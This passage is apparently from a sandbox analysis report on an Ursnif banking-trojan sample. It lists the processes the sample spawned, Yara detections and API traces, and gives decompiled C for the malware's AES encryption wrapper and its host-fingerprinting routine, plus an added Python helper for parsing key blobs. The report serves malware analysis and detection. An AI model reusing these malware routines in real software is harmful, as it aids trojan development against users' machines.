              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:29
              Start time:10:28:42
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:30
              Start time:10:28:43
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:31
              Start time:10:28:44
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              Target ID:32
              Start time:10:28:46
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              Target ID:33
              Start time:10:28:47
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:34
              Start time:10:28:47
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:36
              Start time:10:28:50
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:37
              Start time:10:28:50
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:38
              Start time:10:28:52
              Start date:26/01/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
              Imagebase:0x7ff60deb0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:39
              Start time:10:28:55
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:40
              Start time:10:28:56
              Start date:26/01/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
              Imagebase:0x7ff60deb0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:41
              Start time:10:28:57
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:42
              Start time:10:28:58
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:43
              Start time:10:29:00
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:45
              Start time:10:29:02
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:46
              Start time:10:29:02
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:47
              Start time:10:29:03
              Start date:26/01/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff720ea0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:48
              Start time:10:29:05
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
              Imagebase:0x7ff651530000
              File size:47280 bytes
              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language


                Control-flow Graph (graph rendering not reproduced; executed and not-executed blocks were shown in the original figure)
                APIs
                • RtlInitializeCriticalSection.NTDLL(046EE4A8), ref: 046D457E
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046D45AF
                • RtlInitializeCriticalSection.NTDLL(04C9C0A0), ref: 046D45C0
                  • Part of subcall function 046D6126: RtlInitializeCriticalSection.NTDLL(046EE480), ref: 046D614A
                  • Part of subcall function 046D6126: RtlInitializeCriticalSection.NTDLL(046EE460), ref: 046D6160
                  • Part of subcall function 046D6126: GetVersion.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6171
                  • Part of subcall function 046D6126: GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D61A5
                  • Part of subcall function 046D75A8: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 046D75C2
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,046C8D64,?), ref: 046D45E9
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D45FA
                • CloseHandle.KERNEL32(00000448,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D460E
                • GetUserNameA.ADVAPI32(00000000,?), ref: 046D4657
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D466A
                • GetUserNameA.ADVAPI32(00000000,?), ref: 046D467F
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 046D46AF
                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46C4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46CE
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46DB
                • GetShellWindow.USER32 ref: 046D46F6
                • GetWindowThreadProcessId.USER32(00000000), ref: 046D46FD
                • memcpy.NTDLL(046EE374,?,00000018,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4739
                • CreateEventA.KERNEL32(046EE268,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,046C8D64,?), ref: 046D47B7
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 046D47E1
                • OpenEventA.KERNEL32(00100000,00000000,04C9B9D0,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4809
                • CreateEventA.KERNEL32(046EE268,00000001,00000000,04C9B9D0,?,?,?,?,?,?,?,046C8D64,?), ref: 046D481E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4824
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D48BC
                • SetEvent.KERNEL32(?,046E3A35,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046D4952
                • RtlAllocateHeap.NTDLL(00000000,00000043,046E3A35), ref: 046D4967
                • wsprintfA.USER32 ref: 046D4997
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                • String ID:
                • API String ID: 3929413950-0
                • Opcode ID: 904b7d8da50abb4fe78e5d6a922c4f2b9819bf45316ac5c14cb0a15f58fca6a6
                • Instruction ID: 53c103cf66643d55b1dd78757ecc52c77535f397b9087bf0cd620c15d83bbfbc
                • Opcode Fuzzy Hash: 904b7d8da50abb4fe78e5d6a922c4f2b9819bf45316ac5c14cb0a15f58fca6a6
                • Instruction Fuzzy Hash: F6C160B0A003459FD720EF67E84896A7BE8EB95714B40582EF545CB244FB3ABC45CF62
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph for E01C178F2 (graph rendering not reproduced; executed and not-executed blocks were shown in the original figure)
                C-Code - Quality: 58%
                			// AES-128-CBC wrapper over CryptoAPI. __eax = input length, _a4 != 0 selects
                			// encryption (0 = decryption), _a8 = pointer to the 16-byte key (the slot is
                			// reused for the return value afterwards), _a12 = input buffer, *_a16/*_a20
                			// receive the output buffer and its length. Returns 0 on success, else a Win32 error code.
                			E01C178F2(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				int _v8;                // bytes handed to CryptEncrypt/CryptDecrypt per iteration
                				long* _v12;             // HCRYPTKEY
                				int _v16;               // total output length
                				BYTE* _v20;             // output buffer
                				long* _v24;             // HCRYPTPROV
                				void* _v39;
                				char _v40;              // 16-byte IV, all zero
                				void _v56;              // 16-byte key, last field of the PLAINTEXTKEYBLOB
                				int _v60;               // dwKeyLen
                				intOrPtr _v64;          // BLOBHEADER.aiKeyAlg
                				void _v67;              // BLOBHEADER.bVersion
                				char _v68;              // BLOBHEADER.bType (the 0x1c-byte key blob starts here)
                				void* _t61;
                				int _t68;
                				signed int _t76;
                				int _t79;
                				int _t81;
                				int _t85;
                				long _t86;
                				int _t90;
                				signed int _t94;
                				int _t101;
                				BYTE* _t102;
                				int _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                
                				_t103 = __eax;                                         // bytes still to process
                				_t94 = 6;
                				_v68 = 0;
                				memset( &_v67, 0, _t94 << 2);                          // zero the 28-byte key blob
                				_t105 = _t104 + 0xc;
                				asm("stosw");
                				asm("stosb");
                				_v40 = 0;                                              // zero the 16-byte IV
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				asm("stosb");
                				_t61 =  *0x1c1a0a8( &_v24, 0, 0, 0x18, 0xf0000000); // executed: CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)
                				if(_t61 == 0) {
                					_a8 = GetLastError();
                				} else {
                					_t101 = 0x10;
                					memcpy( &_v56, _a8, _t101);                        // raw key bytes follow the 12-byte header
                					_t106 = _t105 + 0xc;
                					_v60 = _t101;                                      // dwKeyLen = 16
                					_v67 = 2;                                          // bVersion = CUR_BLOB_VERSION
                					_v64 = 0x660e;                                     // aiKeyAlg = CALG_AES_128
                					_v68 = 8;                                          // bType = PLAINTEXTKEYBLOB
                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed: 0x1c = BLOBHEADER (8) + dwKeyLen (4) + key (16)
                					if(_t68 == 0) {
                						_a8 = GetLastError();
                					} else {
                						_push(0);
                						_push( &_v40);
                						_push(1);
                						_push(_v12);
                						if( *0x1c1a0d0() == 0) {                       // CryptSetKeyParam(hKey, KP_IV, iv, 0); the mode is left at the CryptoAPI default, CBC
                							_a8 = GetLastError();
                						} else {
                							_t18 = _t103 + 0xf; // 0x11f
                							_t76 = _t18 & 0xfffffff0;                  // round the length up to a whole 16-byte block
                							if(_a4 != 0 && _t76 == _t103) {
                								_t76 = _t76 + _t101;                   // encrypting an aligned input: one extra block for the padding
                							}
                							_t102 = E01C12114(_t76);                   // heap allocation (wraps RtlAllocateHeap)
                							_v20 = _t102;
                							if(_t102 == 0) {
                								_a8 = 8;                               // ERROR_NOT_ENOUGH_MEMORY
                							} else {
                								_v16 = 0;
                								_a8 = 0;
                								while(1) {                             // one 16-byte block per iteration
                									_t79 = 0x10;
                									_v8 = _t79;
                									if(_t103 <= _t79) {
                										_v8 = _t103;                   // short final block
                									}
                									memcpy(_t102, _a12, _v8);
                									_t81 = _v8;
                									_a12 = _a12 + _t81;
                									_t103 = _t103 - _t81;
                									_t106 = _t106 + 0xc;
                									if(_a4 == 0) {                     // Final flag = no input left after this block
                										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                									} else {
                										_t85 =  *0x1c1a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20); // CryptEncrypt; dwBufLen = 0x20 leaves room for the padding block
                									}
                									if(_t85 == 0) {
                										break;
                									}
                									_t90 = _v8;                        // bytes actually produced
                									_v16 = _v16 + _t90;
                									_t102 =  &(_t102[_t90]);
                									if(_t103 != 0) {
                										continue;
                									} else {
                										L17:
                										 *_a16 = _v20;                 // hand the buffer and its length to the caller
                										 *_a20 = _v16;
                									}
                									goto L21;
                								}
                								_t86 = GetLastError();                 // reached only when CryptEncrypt/CryptDecrypt failed
                								_a8 = _t86;
                								if(_t86 != 0) {
                									E01C12C11(_v20);                   // release the buffer (presumably the matching heap free)
                								} else {
                									goto L17;                          // a failure with no last-error code is treated as success
                								}
                							}
                						}
                						L21:
                						CryptDestroyKey(_v12);
                					}
                					CryptReleaseContext(_v24, 0);
                				}
                				return _a8;
                			}

                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,01C17307), ref: 01C1792A
                • memcpy.NTDLL(?,01C17307,00000010,?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92), ref: 01C17943
                • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 01C1796C
                • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 01C17984
                • memcpy.NTDLL(00000000,01C14F92,01C17307,0000011F), ref: 01C179D6
                • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,01C17307,00000020,?,?,0000011F), ref: 01C179FF
                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,01C17307,?,?,0000011F), ref: 01C17A16
                • GetLastError.KERNEL32(?,?,0000011F), ref: 01C17A2E
                • GetLastError.KERNEL32 ref: 01C17A60
                • CryptDestroyKey.ADVAPI32(?), ref: 01C17A6C
                • GetLastError.KERNEL32 ref: 01C17A74
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01C17A81
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92,01C17307,?,01C17307), ref: 01C17A89
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 1967744295-0
                • Opcode ID: 67fd88cde551d328bd140be6a4805028a7afdcf85125c5168145e5276d3207c0
                • Instruction ID: 894d65a07fadf6ceb6f4f54b2ce308676cbd24b8434f55bddc70e86eb83faa48
                • Opcode Fuzzy Hash: 67fd88cde551d328bd140be6a4805028a7afdcf85125c5168145e5276d3207c0
                • Instruction Fuzzy Hash: 8C516E72940249FFDB10DFA9DC85AEE7BB9FB09350F004425F906E6244D771CB54AB61
                Uniqueness

                Uniqueness Score: -1.00%
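                Added example for the routine above; this is not code from the sample or from Joe Sandbox. It rebuilds the 0x1c-byte PLAINTEXTKEYBLOB that E01C178F2 hands to CryptImportKey, parses such a blob back out of a memory dump, and mirrors the output-buffer sizing for the 0x110-byte input seen in the call trace. The key bytes are constructed for the example. The replay helper assumes the third-party `cryptography` package is installed and relies on the two CryptoAPI defaults the sample leaves in place, CBC mode and PKCS#5 padding (with the zero IV set through KP_IV).

```python
"""Rebuild and parse the CryptoAPI key blob used by E01C178F2, and replay the cipher.
Added example: not code from the analysed sample or from Joe Sandbox."""
import struct

PLAINTEXTKEYBLOB = 0x08   # bType written to _v68
CUR_BLOB_VERSION = 0x02   # bVersion written to _v67
CALG_AES_128 = 0x660E     # aiKeyAlg written to _v64
BLOB_LEN = 0x1C           # size passed to CryptImportKey
BLOCK = 16


def build_plaintext_keyblob(key: bytes) -> bytes:
    """Lay out BLOBHEADER + DWORD dwKeyLen + raw key exactly as the sample does."""
    if len(key) != 16:
        raise ValueError("E01C178F2 always imports a 16-byte (AES-128) key")
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128)
    blob = header + struct.pack("<I", len(key)) + key
    assert len(blob) == BLOB_LEN
    return blob


def parse_plaintext_keyblob(blob: bytes) -> dict:
    """Inverse: pull the algorithm id and key out of a blob found in memory, validating the header."""
    btype, bver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    if btype != PLAINTEXTKEYBLOB or bver != CUR_BLOB_VERSION:
        raise ValueError("not a PLAINTEXTKEYBLOB with CUR_BLOB_VERSION")
    (klen,) = struct.unpack_from("<I", blob, 8)
    key = blob[12:12 + klen]
    if len(key) != klen:
        raise ValueError("truncated key blob")
    return {"alg": alg, "key": key}


def output_buffer_len(n: int, encrypt: bool) -> int:
    """Mirror the sizing at 1c179b6..1c179cc: round up to a block and, when encrypting an
    already aligned input, add one block for the PKCS#5 padding CryptEncrypt appends."""
    size = (n + 0xF) & ~0xF
    if encrypt and size == n:
        size += BLOCK
    return size


def aes_cbc_like_sample(key: bytes, data: bytes, encrypt: bool) -> bytes:
    """Replay the cipher with the 'cryptography' package (assumed installed).
    Zero IV and PKCS#7 padding match the KP_IV call and CryptoAPI's default PKCS#5 padding."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    cipher = Cipher(algorithms.AES(key), modes.CBC(bytes(BLOCK)))
    if encrypt:
        padder = padding.PKCS7(128).padder()
        body = padder.update(data) + padder.finalize()
        enc = cipher.encryptor()
        return enc.update(body) + enc.finalize()
    dec = cipher.decryptor()
    body = dec.update(data) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(body) + unpadder.finalize()


if __name__ == "__main__":
    key = bytes(range(16))  # constructed key, not one recovered from this sample
    blob = build_plaintext_keyblob(key)
    print(blob.hex())
    print(parse_plaintext_keyblob(blob))
    print(hex(output_buffer_len(0x110, encrypt=True)), hex(output_buffer_len(0x110, encrypt=False)))
```

The first 12 bytes of the blob (`08 02 00 00 0e 66 00 00 10 00 00 00`) are a usable memory-scan pattern for this key structure; the 16 bytes that follow are the AES key.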

                Control-flow Graph

                Control-flow graph (drawn as an image in the report; node list recovered from it): basic blocks 1c15f8b to 1c16095. Blocks and the calls they make: 1c15fa9 call 1c17452; 1c15fbd GetUserNameW; 1c15fcf RtlAllocateHeap; 1c15fe1 GetUserNameW; 1c15ff0 call 1c16576; 1c1601e GetComputerNameW; 1c16037 RtlAllocateHeap; 1c1604a GetComputerNameW; 1c16055 call 1c16576; all paths join at 1c16073.
                C-Code - Quality: 96%
                			// Derives a host fingerprint into the four-DWORD array at __esi by XOR-folding
                			// hashes of the user name, the computer name and CPUID output. __eax != 0 selects
                			// a seeded variant that skips the user-name lookup; 0 runs the full enumeration.
                			E01C15F8B(char __eax, signed int* __esi) {
                				long _v8;                // buffer length in characters, in/out for GetUserNameW and GetComputerNameW
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t63;
                				signed int* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				signed int* _t69;
                
                				_t69 = __esi;
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x1c1a2c8; // 0xd448b889: built-in seed used when the caller passed none
                					_v12 = _t59;
                				}
                				_t64 = _t69;
                				E01C17452( &_v12, _t64);                           // mixes the seed into the array (body not in this excerpt)
                				if(_t65 != 0) {
                					 *_t69 =  *_t69 ^  *0x1c1a2d4 ^ 0x46d76429;     // seeded variant: constant instead of the user-name hash
                				} else {
                					GetUserNameW(0,  &_v8); // executed: NULL buffer, only the required length comes back in _v8
                					_t50 = _v8;
                					if(_t50 != 0) {
                						_t62 = RtlAllocateHeap( *0x1c1a290, 0, _t50 + _t50);   // length is in wide characters, two bytes each
                						if(_t62 != 0) {
                							if(GetUserNameW(_t62,  &_v8) != 0) {
                								_t63 = _t62;
                								 *_t69 =  *_t69 ^ E01C16576(_v8 + _v8, _t63);      // XOR hash(user name) into DWORD 0; E01C16576 is the hash routine, not shown here
                							}
                							HeapFree( *0x1c1a290, 0, _t62);
                						}
                					}
                				}
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);                        // same size-probe pattern for the computer name
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x1c1a290, 0, _t34 + _t34);
                					if(_t68 != 0) {
                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                							_t63 = _t68;
                							_t69[3] = _t69[3] ^ E01C16576(_v8 + _v8, _t63);        // XOR hash(computer name) into DWORD 3
                						}
                						HeapFree( *0x1c1a290, 0, _t68);
                					}
                				}
                				asm("cpuid");                                      // the decompiler has not recovered the register setup around cpuid;
                				_t67 =  &_v28;                                     // the four stores below save its output registers in _v28.._v16
                				 *_t67 = 1;
                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                				 *(_t67 + 8) = _t63;
                				 *(_t67 + 0xc) = _t64;
                				_t39 = _v16 ^ _v20 ^ _v28;                         // fold three of the four saved registers
                				_t69[1] = _t69[1] ^ _t39;                          // into DWORD 1
                				return _t39;
                			}

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C15FC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C15FD9
